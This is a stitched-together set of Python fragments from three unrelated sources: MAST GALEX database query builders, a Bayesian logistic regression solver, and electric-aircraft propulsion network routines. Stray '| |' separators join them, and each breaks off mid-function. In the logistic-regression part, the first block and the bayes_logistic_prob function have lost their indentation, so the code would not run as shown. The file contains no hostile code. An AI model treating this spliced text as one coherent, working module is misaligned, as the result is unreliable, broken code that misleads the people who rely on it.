# formatted query to the MAST database. Don't change them unless you know what
# you're doing!
baseURL = ('https://mastcomp.stsci.edu/portal/Mashup/MashupQuery.asmx/Galex'
'PhotonListQueryTest?query=')
baseDB = 'GPFCore.dbo'
MCATDB = 'GR6Plus7.dbo'
# All queries from the same _run_ of the photon tools should have identical
# time_id, providing a quick way to troubleshoot issues on the server side.
formatURL = ' -- '+str(time_id)+'&format=extjs'
# ------------------------------------------------------------------------------
# The photon event timestamps are stored in the database at the precision level
# of SQL's BIGINT. This truncated (not rounded) some timestamps at the level
# of 1ms. Most timestamps have a resolution of only 5ms except for rare high
# resolution visits, and even in that case the extra precision does not
# matter for science. To make gAperture consistent with the database, we'll
# truncate times at 1ms for queries.
def truncate(n):
    """Truncate a time to 1ms precision, matching the database's storage.

    The database stores timestamps as BIGINT (seconds * 1000) and truncates
    -- rather than rounds -- sub-millisecond digits, so query bounds must be
    truncated the same way.

    :param n: Time value, in seconds.
    :type n: float
    :returns: str -- The integer-ized time as a string.
    """
    # int() truncates toward zero exactly like the previous
    # str(n * tscale).split('.')[0], but also handles values whose str()
    # renders in scientific notation (e.g. str(1e18) == '1e+18'), which the
    # string-splitting approach silently mangled.
    return str(int(n * tscale))
# ------------------------------------------------------------------------------
def hasNaN(query):
    """Guard against NaN values leaking into a query string.

    A 'NaN' substring in a query almost always indicates that an upstream
    computation went wrong, so fail loudly rather than send it on.

    :param query: The query string to check.
    :type query: str
    """
    if query.find('NaN') >= 0:
        raise RuntimeError("Malformed query: contains NaN values.")
    return
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
def getValue(query, verbose=0, retries=100):
    """
    Manage a database call which returns a single value.

    :param query: The query to run.
    :type query: str
    :param verbose: Verbosity level, a value of 0 is minimum verbosity.
    :type verbose: int
    :param retries: Number of query retries to attempt before giving up.
    :type retries: int
    :returns: float or str -- The first cell of the first row of the query
        result, as a float when possible, otherwise as a string.
    :raises ValueError: If the query never receives a response from the
        server.
    """
    hasNaN(query)
    out = manage_requests2(query, maxcnt=retries, verbose=verbose)
    if out is not None:
        try:
            # Prefer a numeric result...
            out = float(out.json()['data']['Tables'][0]['Rows'][0][0])
        except ValueError:
            # ...but fall back to a string for non-numeric scalars.
            try:
                out = str(out.json()['data']['Tables'][0]['Rows'][0][0])
            except:
                print('Failed: {q}'.format(q=query))
                raise
        except:
            # Any other failure (malformed JSON, empty result) is re-raised
            # after logging the offending query.
            print('Failed: {q}'.format(q=query))
            raise
        return out
    else:
        print('Failed: {q}'.format(q=query))
        raise ValueError("Query never finished on server, run with verbose"
                         " turned on for more info.")
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
def getArray(query, verbose=0, retries=100):
    """
    Manage a database call which returns an array of values.

    :param query: The query to run.
    :type query: str
    :param verbose: Verbosity level, a value of 0 is minimum verbosity.
    :type verbose: int
    :param retries: Number of query retries to attempt before giving up.
    :type retries: int
    :returns: list -- The rows of the query result.
    :raises ValueError: If the query never receives a response from the
        server.
    """
    hasNaN(query)
    response = manage_requests2(query, maxcnt=retries, verbose=verbose)
    if response is None:
        # No response at all after all retries: give up loudly.
        print('Failed: {q}'.format(q=query))
        raise ValueError("Query never finished on server, run with verbose"
                         " turned on for more info.")
    try:
        rows = response.json()['data']['Tables'][0]['Rows']
    except:
        # Malformed/empty payload: log the offending query and re-raise.
        print('Failed: {q}'.format(q=query))
        raise
    return rows
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
def mcat_sources(band, ra0, dec0, radius, maglimit=20.):
    """
    Return the MCAT coadd sources given sky position and search radius
    (and optional lower magnitude limit).

    Columns are:
    [0,RA],[1,Dec],[2,NUV_mag],[3,FUV_mag],[4,FoV_radius],[5,NUV_skybg],
    [6,FUV_skybg],[7,NUV_FWHM_world],[8,FUV_FWHM_world],
    [9:15,FUV_mag_aper_1:7],[16:22,NUV_mag_aper_1:7]
    [23:29,FUV_magerr_aper_1:7],[30:36,NUV_magerr_aper1:7]

    :param band: The band to use, either 'FUV' or 'NUV'.
    :type band: str
    :param ra0: The right ascension, in degrees, around which to search.
    :type ra0: float
    :param dec0: The declination, in degrees, around which to search.
    :type dec0: float
    :param radius: The radius within which to search for MCAT sources, in
        degrees.
    :type radius: float
    :param maglimit: The NUV faint limit to return MCAT sources for.
    :type maglimit: float
    :returns: str -- The query to submit to the database.
    """
    # 1=nuv, 2=fuv, 3=both
    bandflag = 1 if band == 'NUV' else 2
    # fGetNearbyObjEq takes radius in arcminutes
    # [Future]: Add exposure time.
    # Bug fix: a comma was missing between nuv_mag_aper_7 and
    # fuv_magerr_aper_1, which made SQL treat fuv_magerr_aper_1 as a column
    # alias and shifted all subsequent magerr columns by one.
    return (
        str(baseURL)+
        'select ra, dec, nuv_mag, fuv_mag, fov_radius, nuv_skybg, fuv_skybg,'
        ' nuv_fwhm_world, fuv_fwhm_world, fuv_mag_aper_1, fuv_mag_aper_2,'
        ' fuv_mag_aper_3, fuv_mag_aper_4, fuv_mag_aper_5, fuv_mag_aper_6,'
        ' fuv_mag_aper_7, nuv_mag_aper_1, nuv_mag_aper_2, nuv_mag_aper_3,'
        ' nuv_mag_aper_4, nuv_mag_aper_5, nuv_mag_aper_6, nuv_mag_aper_7,'
        ' fuv_magerr_aper_1, fuv_magerr_aper_2, fuv_magerr_aper_3,'
        ' fuv_magerr_aper_4, fuv_magerr_aper_5, fuv_magerr_aper_6,'
        ' fuv_magerr_aper_7, nuv_magerr_aper_1, nuv_magerr_aper_2,'
        ' nuv_magerr_aper_3, nuv_magerr_aper_4, nuv_magerr_aper_5,'
        ' nuv_magerr_aper_6, nuv_magerr_aper_7'
        ' from '+str(MCATDB)+'.photoobjall as p inner join '+str(MCATDB)+
        '.photoextract as pe on p.photoextractid=pe.photoextractid inner join '+
        str(MCATDB)+'.fgetnearbyobjeq('+repr(float(ra0))+', '+
        repr(float(dec0))+', '+
        str(radius*60.)+') as nb on p.objid=nb.objid and (band=3 or band='+
        str(bandflag)+') and '+str(band)+'_mag<'+str(maglimit)+
        str(formatURL))
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
def obstype(objid):
    """
    Build the query returning the dither-pattern (observation type) data
    for a given MCAT object id.
    :param objid: The MCAT Object ID to return the observation type data from.
    :type objid: long
    :returns: str -- The query to submit to the database.
    """
    # Assemble the SELECT once as a template, then substitute the
    # module-level database/URL configuration and the requested object id.
    query_template = (
        '{baseURL}select distinct vpe.mpstype as survey, vpe.tilename,'
        ' vpe.photoextractid, vpe.petal, vpe.nlegs, vpe.leg, vpe.eclipse,'
        ' vpe.img, vpe.subvis from {MCATDB}.visitPhotoextract as vpe inner'
        ' join {MCATDB}.imgrun as iv on vpe.photoextractid=iv.imgrunid'
        ' inner join {MCATDB}.visitphotoobjall as p on vpe.photoextractid'
        '=p.photoextractid where p.objid={objid}{formatURL}')
    return query_template.format(baseURL=baseURL, MCATDB=MCATDB,
                                 objid=objid, formatURL=formatURL)
# ------------------------------------------------------------------------------
def obstype_from_t(t):
    """
    Build the query returning the dither-pattern (observation type) data
    for a given time stamp.
    """
    query_template = ("{baseURL}SELECT * from {baseDB}.fGetLegObsType({t})"
                      "{formatURL}")
    # The time stamp is truncated before substitution to match the
    # precision expected by the database function.
    return query_template.format(baseURL=baseURL, baseDB=baseDB,
                                 t=truncate(t), formatURL=formatURL)
# ------------------------------------------------------------------------------
def mcat_visit_sources(ra0, dec0, radius):
    """
    Build the query returning MCAT per-visit sources for a sky position and
    search radius.
    The returned columns are:
    [0,objid],[1,ra],[2,dec],[3,NUV_mag],[4,FUV_mag],[5,FoV_radius],
    [6,NUV_skybg],[7,FUV_skybg],[8,NUV_FWHM],[9,FUV_FWHM],[10,FUV_expt],
    [11,NUV_expt],[12:18,FUV_mag_aper_1:7],[19:25,NUV_mag_aper_1:7],
    [26:32,FUV_magerr_aper_1:7],[33:39,NUV_magerr_aper_1:7],[40,Nobssecs],
    [41,Fobssecs],[42,NUV_artifact],[43,FUV_artifact],[44,FUV_obstart],
    [45,FUV_obsend],[46,NUV_obstart],[47,NUV_obsend],
    [48,FUV_ALPHA_J2000],[49,FUV_DELTA_J2000],
    [50,NUV_ALPHA_J2000],[51,NUV_DELTA_J2000]
    :param ra0: The right ascension, in degrees, around which to search.
    :type ra0: float
    :param dec0: The declination, in degrees, around which to search.
    :type dec0: float
    :param radius: The radius within which to search for MCAT sources, in
        degrees.
    :type radius: float
    :returns: str -- The query to submit to the database.
    """
    # Build the template first, then fill in configuration and coordinates.
    # Note: fGetNearbyVisitObjEq expects the radius in arcminutes.
    query_template = (
        "{baseURL}select vpo.objid, ra, dec, nuv_mag, fuv_mag, fov_radius,"
        " nuv_skybg, fuv_skybg, nuv_fwhm_world, fuv_fwhm_world,"
        " vpe.fexptime, vpe.nexptime, fuv_mag_aper_1, fuv_mag_aper_2,"
        " fuv_mag_aper_3, fuv_mag_aper_4, fuv_mag_aper_5, fuv_mag_aper_6,"
        " fuv_mag_aper_7, nuv_mag_aper_1, nuv_mag_aper_2, nuv_mag_aper_3,"
        " nuv_mag_aper_4, nuv_mag_aper_5, nuv_mag_aper_6, nuv_mag_aper_7,"
        " fuv_magerr_aper_1, fuv_magerr_aper_2, fuv_magerr_aper_3,"
        " fuv_magerr_aper_4, fuv_magerr_aper_5, fuv_magerr_aper_6,"
        " fuv_magerr_aper_7, nuv_magerr_aper_1, nuv_magerr_aper_2,"
        " nuv_magerr_aper_3, nuv_magerr_aper_4, nuv_magerr_aper_5,"
        " nuv_magerr_aper_6, nuv_magerr_aper_7, nobssecs, fobssecs,"
        " nuv_artifact, fuv_artifact, vpe.fexpstar, vpe.fexpend,"
        " vpe.nexpstar, vpe.nexpend, FUV_ALPHA_J2000, FUV_DELTA_J2000,"
        " NUV_ALPHA_J2000, NUV_DELTA_J2000"
        " from {MCATDB}.visitphotoobjall as vpo"
        " inner join {MCATDB}.visitphotoextract as vpe on"
        " vpo.photoextractid=vpe.photoextractid inner join"
        " {MCATDB}.fGetNearbyVisitObjEq({ra0},{dec0},{radius}) as nb on"
        " vpo.objid=nb.objid inner join {MCATDB}.imgrun as i on"
        " vpe.photoExtractID=i.imgRunID{formatURL}")
    return query_template.format(baseURL=baseURL, MCATDB=MCATDB,
                                 ra0=float(ra0), dec0=float(dec0),
                                 radius=radius*60., formatURL=formatURL)
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
def mcat_objid_search(objid):
    """
    Build the query returning observation data for a visit-level objid
    (ggoid). Coadd-level data is not yet supported.
    :param objid: The MCAT Object ID to return the observation data from.
    :type objid: long
    :returns: str -- The query to submit to the database.
    """
    # Join the pieces in order; str() coercion mirrors the configured
    # URL/database values, and int() rejects non-integer object ids.
    mcatdb = str(MCATDB)
    pieces = [
        str(baseURL),
        'select objid, minPhotoObsDate, maxPhotoObsDate, obs_date,',
        ' obsdatim, nobssecs, fobssecs, nexptime, fexptime, nexpstar, nexpend,',
        ' fexpstar, fexpend from ', mcatdb, '.visitphotoobjall as vp inner',
        ' join ', mcatdb, '.imgrun as ir on vp.photoextractid=ir.imgrunid',
        ' inner join ', mcatdb, '.visitphotoextract as vpe on',
        ' vp.photoextractid=vpe.photoextractid where objid = ',
        str(int(objid)), str(formatURL),
    ]
    return ''.join(pieces)
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
def exposure_ranges(band, ra0, dec0, t0=1, t1=10000000000000, detsize=1.25,
                    epsilon=0.001):
    """
    Build the query returning the list of times (in one second increments)
    where data exists with an aspect solution within detsize of [ra0,dec0].
    :param band: The band to use, either 'FUV' or 'NUV'.
    :type band: str
    :param ra0: The right ascension, in degrees, around which to search.
    :type ra0: float
    :param dec0: The declination, in degrees, around which to search.
    :type dec0: float
    :param t0: The minimum time stamp to search for exposure ranges.
    :type t0: long
    :param t1: The maximum time stamp to search for exposure ranges.
    :type t1: long
    :param detsize: Effective diameter, in degrees, of the field-of-view.
    :type detsize: float
    :param epsilon: Buffer on t1 to avoid missing the end value in the search.
    :type epsilon: float
    :returns: str -- The query to submit to the database.
    """
    # A falsy band means "search both bands".
    if not band:
        band = 'FUV/NUV'
    # Assemble the query from ordered fragments; repr() keeps full float
    # precision for the coordinates, and detsize (a diameter in degrees)
    # is converted to a radius in arcminutes inside the SQL expression.
    pieces = [
        str(baseURL),
        'select distinct time from ', str(baseDB),
        '.fGetNearbyAspectEq(', repr(float(ra0)), ',', repr(float(dec0)),
        ',((', str(detsize), '/2.0)*60.0),',
        truncate(t0), ',', truncate(t1 + epsilon), ')',
        " where band='", str(band), "' or band='FUV/NUV' order by time",
        str(formatURL),
    ]
    return ''.join(pieces)
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
def exposure_range(band, ra0, dec0, t0=1, | |
)
if len(np.atleast_1d(weights)) != len(np.atleast_1d(y)):
raise ValueError(' weight vector must be same length as response vector')
# calculate log posterior Hessian
mu = logistic_prob(X, w)
S = mu * (1. - mu) * weights
if len(H.shape) == 2:
H_log_post = np.dot(X.T, X * S[:, np.newaxis]) + H
elif len(H.shape) == 1:
H_log_post = np.diag(np.dot(X.T, X * S[:, np.newaxis])) + H
else:
raise ValueError('Incompatible Hessian')
return H_log_post
def HP_log_posterior(w, q, wprior, H, y, X, weights=None):
    """Return the diagonal Hessian of the negative log posterior multiplied
    by an arbitrary vector.
    Useful for the Newton-CG solver when only a diagonal Hessian is stored.
    Parameters
    ----------
    w : array-like, shape (p, )
        parameter vector at which the Hessian is to be evaluated
    q : array-like, shape (p, )
        arbitrary vector to multiply Hessian by
    wprior : array-like, shape (p, )
        array of prior means on the parameters to be fit
    H : array-like, shape (p, )
        array of diagonal log prior Hessian (inverse covariance of prior distribution of parameters)
    y : array-like, shape (N, )
        array of binary ({0,1}) responses
    X : array-like, shape (N, p)
        array of features
    weights : array-like, shape (N, )
        array of data point weights. Should be within [0,1]
    Returns
    -------
    HP : array-like, shape (p, )
        Hessian of log posterior (diagonal approx) multiplied by arbitrary vector
    References
    ----------
    Chapter 8 of Murphy, K. 'Machine Learning a Probabilistic Perspective', MIT Press (2012)
    Chapter 4 of Bishop, C. 'Pattern Recognition and Machine Learning', Springer (2006)
    """
    # Default to uniform weights, then validate the length.
    n_obs = len(np.atleast_1d(y))
    if weights is None:
        weights = np.ones(n_obs, )
    if len(np.atleast_1d(weights)) != n_obs:
        raise ValueError(' weight vector must be same length as response vector')
    # Elementwise product implements the diagonal Hessian-vector product.
    return H_log_posterior(w, wprior, H, y, X, weights) * q
def fit_bayes_logistic(y, X, wprior, H, weights=None, solver='Newton-CG', bounds=None, maxiter=100):
    """ Bayesian Logistic Regression Solver. Assumes a Laplace (Gaussian)
    approximation to the posterior of the fitted parameter vector, and uses
    scipy.optimize.minimize to find the MAP estimate.
    Parameters
    ----------
    y : array-like, shape (N, )
        array of binary {0,1} responses
    X : array-like, shape (N, p)
        array of features
    wprior : array-like, shape (p, )
        array of prior means on the parameters to be fit
    H : array-like, shape (p, p) or (p, )
        array of prior Hessian (inverse covariance of prior distribution of parameters)
    weights : array-like, shape (N, )
        array of data point weights. Should be within [0,1]
    solver : string
        scipy optimize solver used. this should be either 'Newton-CG', 'BFGS' or 'L-BFGS-B'.
        The default is Newton-CG.
    bounds : iterable of length p
        a length p list (or tuple) of tuples each of length 2.
        This is only used if the solver is set to 'L-BFGS-B'. In that case, a tuple
        (lower_bound, upper_bound), both floats, is defined for each parameter. See the
        scipy.optimize.minimize docs for further information.
    maxiter : int
        maximum number of iterations for scipy.optimize.minimize solver.
    Returns
    -------
    w_fit : array-like, shape (p, )
        posterior parameters (MAP estimate)
    H_fit : array-like, shape like `H`
        posterior Hessian (Hessian of negative log posterior evaluated at MAP parameters)
    References
    ----------
    Chapter 8 of Murphy, K. 'Machine Learning a Probabilistic Perspective', MIT Press (2012)
    Chapter 4 of Bishop, C. 'Pattern Recognition and Machine Learning', Springer (2006)
    """
    # ---- input validation -------------------------------------------------
    if len(X.shape) != 2:
        raise ValueError('X must be a N*p matrix')
    (nX, pX) = X.shape
    if len(y.shape) > 1:
        raise ValueError('y must be a vector of shape (p, )')
    if len(np.atleast_1d(y)) != nX:
        raise ValueError('y and X do not have the same number of rows')
    if len(wprior.shape) > 1:
        raise ValueError('prior should be a vector of shape (p, )')
    if len(np.atleast_1d(wprior)) != pX:
        raise ValueError('prior mean has incompatible length')
    # The prior Hessian may be a full p*p matrix or its diagonal as a vector.
    if len(H.shape) == 1:
        if np.atleast_1d(H).shape[0] != pX:
            raise ValueError('prior Hessian is diagonal but has incompatible length')
    elif len(H.shape) == 2:
        (h1, h2) = np.atleast_2d(H).shape
        if h1 != h2:
            raise ValueError('prior Hessian must either be a p*p square matrix or a vector or shape (p, ) ')
        if h1 != pX:
            raise ValueError('prior Hessian is square but has incompatible size')
    # Default to uniform data-point weights.
    if weights is None:
        weights = np.ones(len(np.atleast_1d(y)), )
    if len(np.atleast_1d(weights)) != len(np.atleast_1d(y)):
        raise ValueError(' weight vector must be same length as response vector')
    # ---- optimization -----------------------------------------------------
    # All solvers share the objective arguments and iteration budget; only
    # the Hessian information passed to minimize differs.
    obj_args = (wprior, H, y, X, weights)
    opts = {'maxiter': maxiter}
    if solver == 'Newton-CG':
        if len(H.shape) == 2:
            # Full Hessian available: pass it directly.
            ww = minimize(f_log_posterior, wprior, args=obj_args,
                          jac=g_log_posterior, hess=H_log_posterior,
                          method='Newton-CG', options=opts)
        elif len(H.shape) == 1:
            # Diagonal Hessian: supply a Hessian-vector product instead.
            ww = minimize(f_log_posterior, wprior, args=obj_args,
                          jac=g_log_posterior, hessp=HP_log_posterior,
                          method='Newton-CG', options=opts)
        else:
            raise ValueError(' You must either use the full Hessian or its diagonal as a vector')
    elif solver == 'BFGS':
        ww = minimize(f_log_posterior, wprior, args=obj_args,
                      jac=g_log_posterior_small, method='BFGS', options=opts)
    elif solver == 'L-BFGS-B':
        ww = minimize(f_log_posterior, wprior, args=obj_args,
                      jac=g_log_posterior_small, method='L-BFGS-B',
                      bounds=bounds, options=opts)
    else:
        raise ValueError('Unknown solver specified: "{0}"'.format(solver))
    # Evaluate the posterior Hessian at the MAP estimate.
    w_fit = ww.x
    H_fit = H_log_posterior(w_fit, wprior, H, y, X, weights)
    return w_fit, H_fit
def get_pvalues(w, H):
    """ Calculate p-values for fitted parameters, e.g. for variable selection
    by discarding parameters whose p-value exceeds some cutoff (say 0.05).
    Parameters
    ----------
    w : array-like, shape (p, )
        array of posterior means on the fitted parameters
    H : array-like, shape (p, p) or (p, )
        array of log posterior Hessian
    Returns
    -------
    pvals : array-like, shape (p, )
        array of p-values for each of the fitted parameters
    References
    ----------
    Chapter 2 of Pawitan, Y. 'In All Likelihood', Oxford University Press (2013)
    Also see: Gerhard, F. 'Extraction of network topology from multi-electrode recordings: is there
    a small world effect', Frontiers in Computational Neuroscience (2011) for a use case of
    p-value based variable selection.
    """
    # The Hessian equals the Fisher information, so its (diagonal) square
    # root is the reciprocal of each parameter's standard error.
    ndim = len(H.shape)
    if ndim == 2:
        inv_std_err = np.sqrt(np.diag(H))
    elif ndim == 1:
        inv_std_err = np.sqrt(H)
    else:
        raise ValueError("Incompatible Hessian provided")
    # Wald statistic, compared against the standard normal CDF (two-sided).
    wald = np.abs(w * inv_std_err)
    return 2. * (1. - norm.cdf(wald))
def bayes_logistic_prob(X, w, H):
""" Posterior predictive logistic regression probability. Uses probit approximation
to the logistic regression sigmoid. Also has overflow prevention via exponent truncation.
Parameters
----------
X : array-like, shape (N, p)
array of covariates
w : array-like, shape (p, )
array of fitted MAP parameters
H : array-like, shape (p, p) or (p, )
array of log posterior Hessian (covariance matrix of fitted MAP parameters)
Returns
-------
pr : array-like, shape (N, )
moderated (by full distribution) logistic probability
References
----------
Chapter 8 of <NAME>. 'Machine Learning a Probabilistic Perspective', MIT Press (2012)
Chapter 4 of <NAME>. 'Pattern Recognition and Machine Learning', Springer (2006)
"""
# set a truncation exponent
trunc = 8. # exp(8)/(1+exp(8)) = 0.9997 which is close enough to 1 as to not matter in most cases.
# unmoderated argument of exponent
z_a = np.dot(X, w)
# find the moderation
if len(H.shape) == 2:
H_inv_ = np.linalg.inv(H)
sig2_a = np.sum(X * np.dot(H_inv_, X.T).T, axis=1)
elif len(H.shape) == 1:
H_inv_ = 1. / H
sig2_a = np.sum(X * (H_inv_ * X), axis=1)
else:
raise ValueError(' You must either use the full Hessian or its diagonal as a vector')
# get the moderation factor. Implicit in here is approximating the logistic sigmoid with
# a probit by setting the probit and sigmoid slopes to be equal at the origin. This is where
# the factor of pi/8 comes from.
kappa_sig2_a = | |
link
battery.inputs.current = -battery.cell.charging_current*n_parallel * np.ones_like(volts)
battery.inputs.voltage = battery.cell.charging_voltage*n_series * np.ones_like(volts)
battery.inputs.power_in = -battery.inputs.current * battery.inputs.voltage
battery.energy_calc(numerics,battery_discharge_flag)
total_prop_thrust = np.zeros((len(volts),3))
total_lift_rotor_thrust = np.zeros((len(volts),3))
P_forward = np.zeros((len(volts),1))
P_lift = np.zeros((len(volts),1))
current_total = battery.cell.charging_current*n_parallel * np.ones_like(volts)
# Pack the conditions for outputs
P = P_forward + P_lift
avionics_payload_power = avionics.outputs.power + payload.outputs.power
pack_battery_conditions(conditions,battery,avionics_payload_power,P)
F_total = total_prop_thrust + total_lift_rotor_thrust
results = Data()
results.thrust_force_vector = F_total
results.vehicle_mass_rate = state.ones_row(1)*0.0
return results
def unpack_unknowns_transition(self,segment):
    """ This is an extra set of unknowns which are unpacked from the mission solver and sent to the network.
    This uses all the motors.
    Assumptions:
    None
    Source:
    N/A
    Inputs:
    state.unknowns.lift_rotor_power_coefficient [None]
    state.unknowns.propeller_power_coefficient  [None]
    state.unknowns.throttle_lift                [0-1]
    state.unknowns.throttle                     [0-1]
    Outputs:
    state.conditions.propulsion.lift_rotor_power_coefficient [None]
    state.conditions.propulsion.propeller_power_coefficient  [None]
    state.conditions.propulsion.throttle_lift                [0-1]
    state.conditions.propulsion.throttle                     [0-1]
    Properties Used:
    N/A
    """
    # unpack the ones function
    ones_row = segment.state.ones_row
    # Unpack the unknowns provided for this network
    ss = segment.state
    if segment.battery_discharge:
        ss.conditions.propulsion.lift_rotor_power_coefficient = segment.state.unknowns.lift_rotor_power_coefficient
        ss.conditions.propulsion.propeller_power_coefficient  = segment.state.unknowns.propeller_power_coefficient
        ss.conditions.propulsion.throttle_lift                = segment.state.unknowns.throttle_lift
        ss.conditions.propulsion.throttle                     = segment.state.unknowns.throttle
    else:
        # BUGFIX: this attribute was previously misspelled as
        # 'propeller_power_coefficientb', so the real coefficient was never
        # zeroed during charge segments. Fixed to match unpack_unknowns_cruise.
        ss.conditions.propulsion.propeller_power_coefficient = 0. * ones_row(1)
    battery = self.battery
    battery.append_battery_unknowns(segment)
    return
def unpack_unknowns_cruise(self,segment):
    """ Unpack the mission solver's unknowns into the network conditions for
    a cruise segment: only the forward (propeller) motors operate, the lift
    rotors are turned off.
    Assumptions:
    Only the forward motors are used; the rest are off.
    Source:
    N/A
    Inputs:
    state.unknowns.propeller_power_coefficient [None]
    state.unknowns.throttle                    [0-1]
    Outputs:
    state.conditions.propulsion.propeller_power_coefficient  [None]
    state.conditions.propulsion.lift_rotor_power_coefficient [None]
    state.conditions.propulsion.throttle_lift                [0-1]
    state.conditions.propulsion.throttle                     [0-1]
    Properties Used:
    N/A
    """
    ones_row   = segment.state.ones_row
    propulsion = segment.state.conditions.propulsion
    unknowns   = segment.state.unknowns
    if segment.battery_discharge:
        # Lift rotors are off in cruise: zero their throttle and coefficient.
        propulsion.throttle_lift                = 0.0 * ones_row(1)
        propulsion.lift_rotor_power_coefficient = 0.0 * ones_row(1)
        propulsion.propeller_power_coefficient  = unknowns.propeller_power_coefficient
        propulsion.throttle                     = unknowns.throttle
    else:
        # Charging: no thrust is produced.
        propulsion.propeller_power_coefficient = 0. * ones_row(1)
    self.battery.append_battery_unknowns(segment)
    return
def unpack_unknowns_lift(self,segment):
    """ Unpack the mission solver's unknowns into the network conditions for
    a hover/lift segment: only the lift rotors operate, the forward
    propellers are turned off.
    Assumptions:
    Only the lift motors are used; the rest are off.
    Source:
    N/A
    Inputs:
    state.unknowns.lift_rotor_power_coefficient [None]
    state.unknowns.throttle_lift                [0-1]
    Outputs:
    state.conditions.propulsion.propeller_power_coefficient  [None]
    state.conditions.propulsion.lift_rotor_power_coefficient [None]
    state.conditions.propulsion.throttle_lift                [0-1]
    state.conditions.propulsion.throttle                     [0-1]
    Properties Used:
    N/A
    """
    ones_row   = segment.state.ones_row
    propulsion = segment.state.conditions.propulsion
    unknowns   = segment.state.unknowns
    if segment.battery_discharge:
        # Forward propellers are off in lift: zero their throttle/coefficient.
        propulsion.throttle_lift                = unknowns.throttle_lift
        propulsion.lift_rotor_power_coefficient = unknowns.lift_rotor_power_coefficient
        propulsion.propeller_power_coefficient  = 0.0 * ones_row(1)
        propulsion.throttle                     = 0.0 * ones_row(1)
    else:
        # Charging: everything is off.
        zeros = 0.0 * ones_row(1)
        propulsion.propeller_power_coefficient  = zeros
        propulsion.throttle_lift                = zeros
        propulsion.lift_rotor_power_coefficient = zeros
        propulsion.throttle                     = zeros
    self.battery.append_battery_unknowns(segment)
    return
def residuals_transition(self,segment):
    """ Pack the torque-balance residuals for the mission solver.
    Use this when all motors (propellers and lift rotors) are operational.
    Assumptions:
    All motors are operational
    Source:
    N/A
    Inputs:
    state.conditions.propulsion:
        propeller_motor_torque  [N-m]
        lift_rotor_motor_torque [N-m]
        propeller_torque        [N-m]
        lift_rotor_torque       [N-m]
    Outputs:
    None
    Properties Used:
    N/A
    """
    if segment.battery_discharge:
        propulsion = segment.state.conditions.propulsion
        # Torque balance: each motor's torque must match the torque
        # absorbed by the rotor it drives.
        segment.state.residuals.network.propellers = (
            propulsion.propeller_motor_torque - propulsion.propeller_torque)
        segment.state.residuals.network.lift_rotors = (
            propulsion.lift_rotor_motor_torque - propulsion.lift_rotor_torque)
    self.battery.append_battery_residuals(segment,self)
    return
def residuals_cruise(self,segment):
    """ Pack the torque-balance residuals for the mission solver.
    Use this when only the forward (propeller) motors are operational.
    Assumptions:
    Only the forward motors are operational
    Source:
    N/A
    Inputs:
    state.conditions.propulsion:
        propeller_motor_torque [N-m]
        propeller_torque       [N-m]
    Outputs:
    None
    Properties Used:
    N/A
    """
    if segment.battery_discharge:
        propulsion = segment.state.conditions.propulsion
        # Torque balance for the forward propellers only.
        segment.state.residuals.network.propellers = (
            propulsion.propeller_motor_torque - propulsion.propeller_torque)
    self.battery.append_battery_residuals(segment,self)
    return
def residuals_lift(self,segment):
    """ Pack the torque-balance residuals for the mission solver.
    Use this when only the lift-rotor motors are operational.
    Assumptions:
    The lift motors are operational
    Source:
    N/A
    Inputs:
    state.conditions.propulsion:
        lift_rotor_motor_torque [N-m]
        lift_rotor_torque       [N-m]
    Outputs:
    None
    Properties Used:
    N/A
    """
    if segment.battery_discharge:
        propulsion = segment.state.conditions.propulsion
        # Torque balance for the lift rotors only.
        segment.state.residuals.network.lift_rotors = (
            propulsion.lift_rotor_motor_torque - propulsion.lift_rotor_torque)
    self.battery.append_battery_residuals(segment,self)
    return
def add_transition_unknowns_and_residuals_to_segment(self, segment, initial_voltage = None,
                                                     initial_prop_power_coefficient = 0.005,
                                                     initial_lift_rotor_power_coefficient = 0.005,
                                                     initial_throttle_lift = 0.9,
                                                     initial_battery_cell_temperature = 283. ,
                                                     initial_battery_state_of_charge = 0.5,
                                                     initial_battery_cell_current = 5.):
    """ This function sets up the information that the mission needs to run a mission segment using this network
    Assumptions:
    None
    Source:
    N/A
    Inputs:
    segment
    initial_voltage                       [v]
    initial_prop_power_coefficient        [float]
    initial_lift_rotor_power_coefficient  [float]
    initial_throttle_lift                 [0-1]
    initial_battery_cell_temperature      [K]
    initial_battery_state_of_charge       [0-1]
    initial_battery_cell_current          [A]
    Outputs:
    segment.state.unknowns.throttle_lift
    segment.state.unknowns.propeller_power_coefficient
    segment.state.unknowns.lift_rotor_power_coefficient
    segment.state.conditions.propulsion.propeller_motor_torque
    segment.state.conditions.propulsion.propeller_torque
    Properties Used:
    N/A
    """
    # unpack the ones function
    ones_row = segment.state.ones_row
    # Count how many unknowns and residuals based on p
    n_props       = len(self.propellers)
    n_lift_rotors = len(self.lift_rotors)
    n_motors_p    = len(self.propeller_motors)
    n_motors_r    = len(self.lift_rotor_motors)
    n_eng_p       = self.number_of_propeller_engines
    n_eng_r       = self.number_of_lift_rotor_engines
    # BUGFIX: the original used `assert('<message>')`, which asserts a
    # non-empty string and therefore always passes, so mismatched counts
    # were never caught. Assert the actual equality of the counts instead.
    assert n_props == n_motors_p == n_eng_p, \
        'The number of propellers is not the same as the number of motors'
    assert n_lift_rotors == n_motors_r == n_eng_r, \
        'The number of lift_rotors is not the same as the number of motors'
    # Now check if the props/lift_rotors are all identical, in this case they have the same of residuals and unknowns
    if self.identical_propellers:
        n_props = 1
    else:
        self.number_of_propeller_engines = int(self.number_of_propeller_engines)
    if self.identical_lift_rotors:
        n_lift_rotors = 1
    else:
        self.number_of_lift_rotor_engines = int(self.number_of_lift_rotor_engines)
    # Assign initial segment conditions to segment if missing
    battery = self.battery
    append_initial_battery_conditions(segment,battery)
    # add unknowns and residuals specific to battery cell
    segment.state.residuals.network = Residuals()
    battery.append_battery_unknowns_and_residuals_to_segment(segment,initial_voltage, initial_battery_cell_temperature ,
                                                             initial_battery_state_of_charge, initial_battery_cell_current)
    if segment.battery_discharge:
        segment.state.residuals.network.propellers           = 0. * ones_row(n_props)
        segment.state.residuals.network.lift_rotors          = 0. * ones_row(n_lift_rotors)
        segment.state.unknowns.throttle_lift                 = initial_throttle_lift * ones_row(1)
